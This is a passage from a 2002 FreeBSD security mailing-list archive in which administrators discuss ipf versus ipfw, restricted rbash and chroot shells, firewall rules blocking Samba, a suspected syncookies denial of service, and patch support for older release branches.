hub.freebsd.org (Postfix) with ESMTP id 85C5237B408; Wed, 8 May 2002 02:16:16 -0700 (PDT) Received: from cairo.anu.edu.au (localhost [127.0.0.1]) by cairo.anu.edu.au (8.12.0/8.12.0) with ESMTP id g489GD3g019357; Wed, 8 May 2002 19:16:13 +1000 (EST) Received: (from avalon@localhost) by cairo.anu.edu.au (8.12.0/8.12.0.Beta16) id g489GDec019355; Wed, 8 May 2002 19:16:13 +1000 (EST) From: Darren Reed Message-Id: <200205080916.g489GDec019355@cairo.anu.edu.au> Subject: Re: ipf vs. ipfw To: baldur@foo.is (Baldur Gislason) Date: Wed, 8 May 2002 19:16:13 +1000 (Australia/NSW) Cc: tal@lumeta.com (Tom Limoncelli), freebsd-security@FreeBSD.ORG, freebsd-net@FreeBSD.ORG In-Reply-To: <20020507231529.8B55C2744@tesla.foo.is> from "Baldur Gislason" at May 07, 2002 11:15:17 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In some mail from Baldur Gislason, sie said: > > ipfw is in no way related to the linux firewalls (ipfwadm, ipchains or > iptables). It is a specially designed firewall for FreeBSD. It isn't > dependent on ipf, it has it's own in-kernel mechanism. It has a totally > different syntax. Why FreeBSD has both I can't answer, ipfw and ipf each have > their own advantages over each other. In my experience, ipfw is easier to > work with, but it's also limited in some ways. Ipf tends to have a more > complex ruleset, and more stateful functionality (ipfw can do stateful > filtering but ipf has more customisable state keeping rules IIRC), however > ipfw does have the ability to apply rules by uid's if you're doing a firewall > for the local machine, and it does have a packet/byte counter for each > individual rule. I'm not sure how this is with ipf as I haven't used is as > much as I have used ipfw. ipf has a completely separate set of rules you can use for accounting and is minus any os-specific hacks (such as uid filtering) ipfw does share its roots with the linux ipfw but linux long ago dropped its one and the freebsd one is now much different. ipf used to be more "leading edge" than any of the others and hence offered more features and a bigger coolness factor but I've been slack for the last year or two on that front. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 5:55:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mailhub.isternet.sk (smtp.isternet.sk [195.72.0.60]) by hub.freebsd.org (Postfix) with ESMTP id 345DF37B410 for ; Wed, 8 May 2002 05:55:32 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by mailhub.isternet.sk (Postfix) with ESMTP id E083C34C for ; Wed, 8 May 2002 15:00:05 +0200 (CEST) Received: from branoold (urpin.isternet.sk [195.72.0.1]) by mailhub.isternet.sk (Postfix) with SMTP id 6B32F346 for ; Wed, 8 May 2002 15:00:03 +0200 (CEST) Message-ID: <064601c1f68f$ae8e4480$c28c630a@bb.ubp.sk> From: "[brano]" To: References: <3CD8558E.2FA68C36@lumeta.com> Subject: FreeBSD-SA-02:08 Date: Wed, 8 May 2002 14:55:47 +0200 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Virus-Scanned: by AMaViS snapshot-20010714 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi all, I have FreeBSD 4.5-RELEASE and i compile my own kernel. I need to apply patch FreeBSD-SA-02:08 ? I'm look at file src/sys/conf/newvers.sh which have: # $FreeBSD: src/sys/conf/newvers.sh,v 1.44.2.20.2.1 2002/01/28 06:42:16 murray Exp $ and in patch file is write 1.44.2.17.2.5 Revision then I need apply this patch ? sory english ;-) thanks Brano from Slovakia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 8:56:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 6335A37B404; Wed, 8 May 2002 08:56:39 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g48FuZEN084027; Wed, 8 May 2002 11:56:35 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g48FuY0q084024; Wed, 8 May 2002 11:56:34 -0400 (EDT) Date: Wed, 8 May 2002 11:56:34 -0400 (EDT) From: Garrett Wollman Message-Id: <200205081556.g48FuY0q084024@khavrinen.lcs.mit.edu> To: Darren Reed Cc: freebsd-security@FreeBSD.ORG, freebsd-net@FreeBSD.ORG Subject: Re: ipf vs. ipfw In-Reply-To: <200205080916.g489GDec019355@cairo.anu.edu.au> References: <20020507231529.8B55C2744@tesla.foo.is> <200205080916.g489GDec019355@cairo.anu.edu.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > ipfw does share its roots with the linux ipfw but linux long ago dropped > its one and the freebsd one is now much different. It is possible that the old Lignux `ipfw' was based on FreeBSD's; not the other way around. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 9:24: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from dc.cis.okstate.edu (dc.cis.okstate.edu [139.78.100.219]) by hub.freebsd.org (Postfix) with ESMTP id AEA9637B40A for ; Wed, 8 May 2002 09:23:47 -0700 (PDT) Received: from dc.cis.okstate.edu (localhost [127.0.0.1]) by dc.cis.okstate.edu (8.11.6/8.11.3) with ESMTP id g48GNkl89410 for ; Wed, 8 May 2002 11:23:47 -0500 (CDT) (envelope-from martin@dc.cis.okstate.edu) Message-Id: <200205081623.g48GNkl89410@dc.cis.okstate.edu> Reply-To: martin@dc.cis.okstate.edu To: freebsd-security@FreeBSD.ORG Subject: Accounts with Restricted privileges Date: Wed, 08 May 2002 11:23:46 -0500 From: Martin McCormick Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Is it possible to create an account with a restricted shell? The documentation for bash shows that it can be invoked with the --restricted flag. A check of the handbook shows nothing more about this topic. Neither did a look at the man pages for login. Thank you. Martin McCormick WB5AGZ Stillwater, OK OSU Center for Computing and Information Services Network Operations Group To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 9:31:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from webterminator19.crystaltech.com (mail1.crystaltech.com [216.119.106.20]) by hub.freebsd.org (Postfix) with ESMTP id 0792837B40A for ; Wed, 8 May 2002 09:31:31 -0700 (PDT) Received: from romy [166.84.146.186] by webterminator19.crystaltech.com (SMTPD32-7.06) id A2DC20B0034; Wed, 08 May 2002 09:31:24 -0700 Message-ID: <004801c1f6ad$cbca1c40$ba9254a6@romy> Reply-To: "Justin King" From: "Justin King" To: References: <200205081623.g48GNkl89410@dc.cis.okstate.edu> Subject: Re: Accounts with Restricted privileges Date: Wed, 8 May 2002 12:31:24 -0400 Organization: Othius.com MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org man bash RESTRICTED SHELL If bash is started with the name rbash, or the -r option is supplied at invocation, the shell becomes restricted. A restricted shell is used to set up an environment more controlled than the standard shell. It behaves identi- cally to bash with the exception that the following are disallowed or not performed: o changing directories with cd o setting or unsetting the values of SHELL, PATH, ENV, or BASH_ENV o specifying command names containing / o specifying a file name containing a / as an argu- ment to the . builtin command o Specifying a filename containing a slash as an argument to the -p option to the hash builtin com- mand o importing function definitions from the shell envi- ronment at startup o parsing the value of SHELLOPTS from the shell envi- ronment at startup o redirecting output using the >, >|, <>, >&, &>, and >> redirection operators o using the exec builtin command to replace the shell with another command o adding or deleting builtin commands with the -f and -d options to the enable builtin command o specifying the -p option to the command builtin command o turning off restricted mode with set +r or set +o restricted. ----- Original Message ----- From: "Martin McCormick" To: Sent: Wednesday, May 08, 2002 12:23 PM Subject: Accounts with Restricted privileges > Is it possible to create an account with a restricted > shell? > > The documentation for bash shows that it can be invoked > with the --restricted flag. A check of the handbook shows > nothing more about this topic. Neither did a look at the man > pages for login. > > Thank you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 10:18:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from exgw2.lumeta.com (exgw2.lumeta.com [65.198.68.66]) by hub.freebsd.org (Postfix) with ESMTP id 5823237B409; Wed, 8 May 2002 10:18:22 -0700 (PDT) Received: from lucy.corp.lumeta.com (h65-198-68-133.lumeta.com [65.198.68.133]) by exgw2.lumeta.com (Postfix) with ESMTP id 89157373835; Wed, 8 May 2002 13:18:17 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by lucy.corp.lumeta.com (Postfix) with ESMTP id 7E78C10842; Wed, 8 May 2002 13:18:16 -0400 (EDT) Received: from lumeta.com (tal.corp.lumeta.com [65.198.68.200]) by lucy.corp.lumeta.com (Postfix) with ESMTP id A10E010841; Wed, 8 May 2002 13:18:07 -0400 (EDT) Message-ID: <3CD95E0F.A3E7398C@lumeta.com> Date: Wed, 08 May 2002 13:19:11 -0400 From: Tom Limoncelli Organization: Lumeta Corp X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG, freebsd-net@FreeBSD.ORG Cc: Darren Reed Subject: Re: ipf vs. ipfw References: <200205080916.g489GDec019355@cairo.anu.edu.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thanks to everyone that answered my questions. As in true Usenet tradition, if you want the full story, post a message with a lot of incorrect statements. I got much better results than the carefully thought out queries that I had sent to various people. :-) I've updated my page http://whatexit.org/tal/mywritings/freefilters.html --Tom To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 11:27:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from anchor-post-35.mail.demon.net (anchor-post-35.mail.demon.net [194.217.242.93]) by hub.freebsd.org (Postfix) with ESMTP id 3F97637B405 for ; Wed, 8 May 2002 11:27:50 -0700 (PDT) Received: from caomhin.demon.co.uk ([212.228.234.119]) by anchor-post-35.mail.demon.net with esmtp (Exim 3.35 #1) id 175WAE-0007Q4-0Z; Wed, 08 May 2002 19:27:48 +0100 Message-ID: Date: Wed, 8 May 2002 19:11:55 +0100 To: martin@dc.cis.okstate.edu Cc: freebsd-security@FreeBSD.ORG From: Kevin Golding Subject: Re: Accounts with Restricted privileges References: <200205081623.g48GNkl89410@dc.cis.okstate.edu> In-Reply-To: <200205081623.g48GNkl89410@dc.cis.okstate.edu> MIME-Version: 1.0 X-Mailer: Turnpike Integrated Version 5.01 U Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Someone, quite probably Martin McCormick, once wrote: > Is it possible to create an account with a restricted >shell? > > The documentation for bash shows that it can be invoked >with the --restricted flag. A check of the handbook shows >nothing more about this topic. Neither did a look at the man >pages for login. Copy the bash binary and call it rbash then set the users shell to rbash and when they login they'll be in a restricted shell. Kevin -- kevin@caomhin.demon.co.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 11:29:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from dc.cis.okstate.edu (dc.cis.okstate.edu [139.78.100.219]) by hub.freebsd.org (Postfix) with ESMTP id 808F537B40A for ; Wed, 8 May 2002 11:29:04 -0700 (PDT) Received: from dc.cis.okstate.edu (localhost [127.0.0.1]) by dc.cis.okstate.edu (8.11.6/8.11.3) with ESMTP id g48IT3l42844 for ; Wed, 8 May 2002 13:29:03 -0500 (CDT) (envelope-from martin@dc.cis.okstate.edu) Message-Id: <200205081829.g48IT3l42844@dc.cis.okstate.edu> To: freebsd-security@FreeBSD.ORG Subject: Re: Accounts with Restricted privileges Date: Wed, 08 May 2002 13:29:03 -0500 From: Martin McCormick Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thank you. I missed rbash when I read the bash manual page. It now works great. All one has to do is link rbash to bash and it all works as advertised. "Justin King" writes: >man bash > >RESTRICTED SHELL > If bash is started with the name rbash, or the -r option To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 11:46:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from vortex.wa4phy.net (pcp01578012pcs.martnz01.ga.comcast.net [68.47.4.97]) by hub.freebsd.org (Postfix) with ESMTP id 0CE6A37B40C for ; Wed, 8 May 2002 11:46:13 -0700 (PDT) Received: from vortex.wa4phy.net (localhost.wa4phy.net [127.0.0.1]) by vortex.wa4phy.net (8.11.6/8.11.6) with ESMTP id g48IkCi00609 for ; Wed, 8 May 2002 14:46:12 -0400 (EDT) (envelope-from sam@wa4phy.net) Message-ID: <3CD97274.4B62D938@vortex.wa4phy.net> Date: Wed, 08 May 2002 14:46:12 -0400 From: Sam Drinkard Organization: You Gotta Be Kiddin! X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.5-STABLE i386) X-Accept-Language: en, ja MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Stock rc.firewall Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello all, I may be trying too hard to close stuff off, but I've read so much that I'm pretty confused now, and would appreciate some pointers, or examples. Situation: In setting up the "simple" mode firewall, I find that works quite well -- too well in fact, that it also kills all connectivity to the internal windoze box via samba. Can't ping it nor can it ping the bsd machine. I added a rule, "add pass ip from 192.168.100.5 to any via any, which permits tcp to function, but again, samba is dead becuse of the port 137 blocking. The services I currently need are the ntalkd, and pop3 ports as defined by inetd.conf, port 80, and the other "normal" services ports, i.e., ntp, dns, ssh, etc. I have tried several different ideas, but every time, something breaks something else, and the things I've been reading don't really help much, including the docs on security, ipfw, and web-docs. I'd sure appreciate it if someone could lend a hand here.. and if it will help, here's the basic configuration. FreeBSD connected to cable, feeding a single windoze machine at 192.168.100.5. So its pretty simple network at this point. My linux machine is currently off-line because of a hardware problem, but is also a 192.168 address. If I use the "open" version of the rc.firewall, of course, everything works just great with natd, but that's got to change. TIA... Sam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 12:13:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by hub.freebsd.org (Postfix) with SMTP id 8693D37B404 for ; Wed, 8 May 2002 12:13:46 -0700 (PDT) Received: (qmail 29798 invoked by uid 1001); 8 May 2002 19:13:40 -0000 Message-ID: <20020508191340.29797.qmail@d188h80.mcb.uconn.edu> References: <20020507235944.S8475-100000@utility.clubscholarship.com> In-Reply-To: <20020507235944.S8475-100000@utility.clubscholarship.com> From: "Peter C. Lai" To: Patrick Thomas Cc: freebsd-security@freebsd.org Subject: Re: what does a syncookies attack look like ? Date: Wed, 08 May 2002 19:13:40 GMT Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I have also seen this happen on a box that has run out of swap, or is unable to swap out (which is effectively the same result, but the second could be due to hardware failure). You say that you can no longer connect to the box remotely when the box goes down. Are you patched for the tcpip routing table memory leak? Remember that vulnerability required you to go to patchlevel 4.5-RELEASE-p3 (or -STABLE after the fix). More info on this vuln can be found here: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:21.tcpip.asc Patrick Thomas writes: > > thank you - however based on my description of the crash (kernel seems to > be running, userland is not) people here seem to feel it is not a > syncookies attack. They seem to think a syncookies attack would be a much > harder crash/lock. > > This last email of mine was simply describing why I think it is an attack > in general - just not sure yet what kind. > > Do you have other information that leads you to believe a syncookies > attack could indeed lead to the kind of strange lockup I am describing ? > > thanks. > > > > On Wed, 8 May 2002, Greg Panula wrote: > >> Patrick Thomas wrote: >> > >> > The reason we suspect it is an attack - or at least an outside influence - >> > is that the crash/hang occurs at exxactly the same time every day. Of >> > course the first reaction to that would be "probably a cron job" ... >> > however we have ruled that out by setting the system time to the time that >> > it crashes .. at times of the day with analogous (or greater) load than >> > when it really does crash. When we artificially set the time to the "zero >> > hour" nothing happens. >> > >> > However, when that time comes up in the "real world", the server hangs >> > like I described. >> . >> . >> . >> > tcpdump on the machine itself and on the firewall reveals nothing >> > interesting. Not an interesting level of traffic in terms of transactions >> > or bandwidth. We're going crazy here trying to figure it out. We are >> > running the very first 4.5-RELEASE, and we have so far only patched the >> > included sshd, and done the chmod on the `keylink` file or whatever it waw >> > that was suid root. Otherwise it is a stock very first release of >> > 4.5-RELEASE. >> > >> > thanks for any suggestions/help, >> > >> >> The answer to your problem it probably related to security advisory: >> FreeBSD-SA-02:20 "syncache/syncookies denial of service" >> >> The full text of the advisory can be found at: >> ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02%3A20.syncache.asc >> >> All of the security advisories can be found at: >> http://www.freebsd.org/security/index.html#adv >> >> >> A google search for 'syncookies' or 'synflooding' should turn up some useful >> information about SYN flooding and the use syncookies as a defense. >> >> I found a quick description at: >> http://www.incidents.org/diary/november01/110801.php >> >> "On some operating systems it is possible to configure the >> kernel to use a SYN flood protection mechanism known as >> SYNcookies. The idea is that, if the server should detect >> a SYN flood attack, it can stop keeping state on waiting-to-be- >> completed three way handshakes, and switch to a challenge-response >> mechanism for accepting new connections. >> >> When in "flood protection mode" the server embeds a cryptographically >> strong "cookie" in the TCP header of each SYN-ACK it sends. This >> cookie is a state-keeping mechanism. If a real client is actually >> engaged on the other end of the connection, the client will >> automatically return the cookie to the server when responding >> with the final ACK of the three-way-handshake. Thus, the server >> can completely forget about the connection after sending the >> SYN-ACK, because all the state data required to establish the >> new connection arrives in the final ACK. " >> >> Good luck, >> Greg >>  >> > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message ----------- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology | Undergraduate Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 13:54:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from router.drapple.com (12-225-1-178.client.attbi.com [12.225.1.178]) by hub.freebsd.org (Postfix) with ESMTP id 22E6037C125 for ; Wed, 8 May 2002 13:47:59 -0700 (PDT) Received: from work.drapple.com (work [192.168.1.10]) by router.drapple.com (8.9.3/8.9.3) with ESMTP id NAA01856 for ; Wed, 8 May 2002 13:48:22 -0700 (PDT) (envelope-from mark@work.drapple.com) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 Date: Wed, 08 May 2002 13:47:58 -0700 (PDT) From: Mark Hartley To: freebsd-security@freebsd.org Subject: support for RELENG_4_4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I have a question regarding the -SECURITY branch (I know that's not its real name) for 4.4. It has been stated (and I found this out only recently) that the only branches supported for security patches would be the current one and the previous one, which currently means RELENG_4_4 and RELENG_4_5. I'm assuming that after 4.6 gets released, that security fixes will no longer be (always) applied to the 4_4 branch. Is this correct information? I was bit by this, because I had several servers using the 4_3 branch, and I didn't realize for quite a while that all of the fixes were not being applied there (this was after 4.5 came out). I don't know about many others, but I can't simply throw the newest version on my servers whenever it comes out. I wait for several months before upgrading, just to make sure there aren't any "gotchas" that weren't found during the release engineering process. The problem with waiting is that before the time I feel I can move up, the branch I've been following has stopped receiving all of the security fixes. I have a bunch of servers tracking 4_4 and I'm not ready to move them off of that yet. I probably won't be moving them to track RELENG_4_5 until at least mid summer. So my question is two-fold: 1. Is the 4_4 branch about to lose it's status as a "receives all security fixes" branch? 2. Can an email be sent to -security (or wherever deemed appropriate) if/when that happens so that people like me can know about it? I understand why only the newest branches get all of the security fixes, due to the difficulty in porting to older versions of apps, so I'm not griping about the policy (since I'm not enough of a C coder to make patches for the older versions). I'm just wanting to know if the policy can be made more public so folks like me can know when we have to either upgrade or live on our own. Mark. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 13:54:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 8D33337C14B for ; Wed, 8 May 2002 13:48:13 -0700 (PDT) Received: (qmail 2393 invoked from network); 8 May 2002 20:48:02 -0000 Received: from unknown (HELO h410g3n.localnet) (204.209.140.10) by 0 with SMTP; 8 May 2002 20:48:02 -0000 Content-Type: text/plain; charset="us-ascii" From: "Dalin S. Owen" Reply-To: dowen@pstis.com Organization: Nexus XI Corp. To: security@freebsd.org Subject: Re: Accounts with Restricted privileges Date: Wed, 8 May 2002 14:43:51 -0600 X-Mailer: KMail [version 1.4] MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200205081443.51457.dowen@pstis.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On May 8, 2002 10:31 am, Justin King wrote: Actually.. I am looking for the almost same answer... what about a chroot= -ed=20 shell? ie. they can "cd" forwards but not back beyond my designated "/".= =2E.=20 and I quote (from bash's manpage): "When a command that is found to be a shell script is exe- cuted (see COMMAND EXECUTION above), rbash turns off any restrictions in the shell spawned to execute the script." I don't want that. I want all other processes to be chrooted too. By no= w=20 some of you are thinking "jail"... A jail won't cut it, because you can't= use=20 quotas in a jail. Does anyone know to do this with bash, or any other shell? I recall some= one=20 talking about a shell that could do all of the above. Thanks! :) FreeBSD Rox, BTW! > man bash > > RESTRICTED SHELL > If bash is started with the name rbash, or the -r option > is supplied at invocation, the shell becomes restricted. > A restricted shell is used to set up an environment more > controlled than the standard shell. It behaves identi- > cally to bash with the exception that the following are > disallowed or not performed: > > o changing directories with cd > > o setting or unsetting the values of SHELL, PATH, > ENV, or BASH_ENV > > o specifying command names containing / > > o specifying a file name containing a / as an argu- > ment to the . builtin command > > o Specifying a filename containing a slash as an > argument to the -p option to the hash builtin com- > mand > > o importing function definitions from the shell envi- > ronment at startup > > o parsing the value of SHELLOPTS from the shell envi- > ronment at startup > > o redirecting output using the >, >|, <>, >&, &>, and > > >> redirection operators > > o using the exec builtin command to replace the shell > with another command > > o adding or deleting builtin commands with the -f and > -d options to the enable builtin command > > o specifying the -p option to the command builtin > command > > o turning off restricted mode with set +r or set +o > restricted. > > > > ----- Original Message ----- > From: "Martin McCormick" > To: > Sent: Wednesday, May 08, 2002 12:23 PM > Subject: Accounts with Restricted privileges > > > Is it possible to create an account with a restricted > > shell? > > > > The documentation for bash shows that it can be invoked > > with the --restricted flag. A check of the handbook shows > > nothing more about this topic. Neither did a look at the man > > pages for login. > > > > Thank you. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 14:15:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from slc.edu (weir-01c.slc.edu [207.106.89.46]) by hub.freebsd.org (Postfix) with ESMTP id 8DAB337B41B for ; Wed, 8 May 2002 14:15:11 -0700 (PDT) Received: (from anthony@localhost) by slc.edu (8.11.6/8.11.6) id g48LHHH37683; Wed, 8 May 2002 17:17:17 -0400 (EDT) (envelope-from anthony) Date: Wed, 8 May 2002 17:17:17 -0400 From: Anthony Schneider To: "Dalin S. Owen" Cc: security@FreeBSD.ORG Subject: Re: Accounts with Restricted privileges Message-ID: <20020508171717.A37592@mail.slc.edu> References: <200205081443.51457.dowen@pstis.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="IS0zKkzwUGydFO0o" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200205081443.51457.dowen@pstis.com>; from dowen@pstis.com on Wed, May 08, 2002 at 02:43:51PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --IS0zKkzwUGydFO0o Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable if you don't have any luck finding a shell with chrootability, you could easily write a simple setuid wrapper to chroot() and then execute rbash, where rbash is located within the chrooted file hierarchy. -Anthony. On Wed, May 08, 2002 at 02:43:51PM -0600, Dalin S. Owen wrote: > On May 8, 2002 10:31 am, Justin King wrote: >=20 > Actually.. I am looking for the almost same answer... what about a chroot= -ed=20 > shell? ie. they can "cd" forwards but not back beyond my designated "/".= ..=20 > and I quote (from bash's manpage): >=20 > "When a command that is found to be a shell script is exe- > cuted (see COMMAND EXECUTION above), rbash turns off any > restrictions in the shell spawned to execute the script." >=20 > I don't want that. I want all other processes to be chrooted too. By no= w=20 > some of you are thinking "jail"... A jail won't cut it, because you can't= use=20 > quotas in a jail. >=20 > Does anyone know to do this with bash, or any other shell? I recall some= one=20 > talking about a shell that could do all of the above. >=20 > Thanks!:) >=20 > FreeBSD Rox, BTW! >=20 > > man bash > > > > RESTRICTED SHELL > > If bash is started with the name rbash, or the -r option > > is supplied at invocation, the shell becomes restricted. > > A restricted shell is used to set up an environment more > > controlled than the standard shell. It behaves identi- > > cally to bash with the exception that the following are > > disallowed or not performed: > > > > o changing directories with cd > > > > o setting or unsetting the values of SHELL, PATH, > > ENV, or BASH_ENV > > > > o specifying command names containing / > > > > o specifying a file name containing a / as an argu- > > ment to the . builtin command > > > > o Specifying a filename containing a slash as an > > argument to the -p option to the hash builtin com- > > mand > > > > o importing function definitions from the shell envi- > > ronment at startup > > > > o parsing the value of SHELLOPTS from the shell envi- > > ronment at startup > > > > o redirecting output using the >, >|, <>, >&, &>, and > > > > >> redirection operators > > > > o using the exec builtin command to replace the shell > > with another command > > > > o adding or deleting builtin commands with the -f and > > -d options to the enable builtin command > > > > o specifying the -p option to the command builtin > > command > > > > o turning off restricted mode with set +r or set +o > > restricted. > > > > > > > > ----- Original Message ----- > > From: "Martin McCormick" > > To: > > Sent: Wednesday, May 08, 2002 12:23 PM > > Subject: Accounts with Restricted privileges > > > > > Is it possible to create an account with a restricted > > > shell? > > > > > > The documentation for bash shows that it can be invoked > > > with the --restricted flag. A check of the handbook shows > > > nothing more about this topic. Neither did a look at the man > > > pages for login. > > > > > > Thank you. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message ----------------------------------------------- PGP key at: http://www.keyserver.net/ http://www.anthonydotcom.com/gpgkey/key.txt Home: http://www.anthonydotcom.com ----------------------------------------------- --IS0zKkzwUGydFO0o Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjzZld0ACgkQ+rDjkNht5F1b/wCgnuaJyW7kHHzJfGPRJ3FbnemB GmEAoJHbS/9lDG6XANRB2oH+2eslSRxA =JJyx -----END PGP SIGNATURE----- --IS0zKkzwUGydFO0o-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 8 15:12:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com 